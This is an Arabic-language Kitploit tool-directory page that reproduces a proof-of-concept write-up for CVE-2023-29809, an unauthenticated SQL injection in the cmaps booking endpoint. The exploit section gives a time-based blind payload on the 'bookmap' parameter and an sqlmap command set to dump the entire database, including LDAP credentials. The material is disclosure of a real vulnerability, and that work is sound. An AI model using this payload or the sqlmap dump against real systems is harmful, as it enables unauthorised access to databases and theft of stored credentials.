Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-29809 | Kitploit
أدوات/GitHubGitHub/zprototype/cve-2023-29809
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubzprototype/cve-2023-29809

CVE-2023-29809

عرض المستودع
11منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

عنوان الاستغلال: حقن SQL دون مصادقة

  • Google Dork:
  • التاريخ: 27.04.2023
  • مؤلف الاستغلال: Lucas Noki (0xPrototype)
  • الصفحة الرئيسية للبائع: https://github.com/vogtmh
  • رابط البرنامج: https://github.com/vogtmh/cmaps
  • الإصدار: 8.0
  • تم اختباره على: Mac, Windows, Linux
  • CVE : CVE-2023-29809

الوصف:

الثغرة المكتشفة هي حقن SQL. المعامل bookmap معرّض للثغرة. عند زيارة الصفحة: http://192.168.0.56/rest/booking/index.php?mode=list&bookmap=test نحصل على استجابة JSON عادية. ولكن إذا تمت إضافة علامة اقتباس مفردة إلى قيمة المعامل bookmap نحصل على رسالة خطأ:

root@kitploit:~
<b>Warning</b>: mysqli_num_rows() expects parameter 1 to be mysqli_result, bool given in <b>/var/www/html/rest/booking/index.php</b> on line <b>152</b><br />

الآن، إذا تمت إضافة علامتي اقتباس مفردتين، نحصل على الاستجابة العادية دون أي خطأ. هذا يؤكد وجود فرصة لحقن SQL. لإثبات حقن SQL فعلياً، نضيف الحمولة التالية:

root@kitploit:~
'-(select*from(select+sleep(2)+from+dual)a)--+

ستنتظر الصفحة لمدة ثانيتين. هذا يؤكد حقن SQL.

خطوات إعادة الإنتاج:

  1. أرسل الحمولة التالية لاختبار الثغرة: '-(select*from(select+sleep(2)+from+dual)a)--+

  2. إذا انتظر الموقع لمدة ثانيتين، شغّل أمر sqlmap التالي لتفريغ قاعدة البيانات بالكامل بما في ذلك بيانات اعتماد ldap.

    root@kitploit:~
    python3 sqlmap.py -u "http://<IP>/rest/booking/index.php?mode=list&bookmap=test*" --random-agent --level 5 --risk 3 --batch --timeout=10 --drop-set-cookie -o --dump
    

شكر خاص إلى iCaotix الذي ساعدني كثيراً في إعداد البيئة وكذلك في تصحيح أخطاء الحمولة الخاصة بي.

الطلب إلى الخادم:

Screenshot 2023-04-30 at 22.23.51

الاستجابة من الخادم:

انظر إلى وقت الاستجابة.

Screenshot 2023-04-30 at 22.24.35
تنزيل الأداة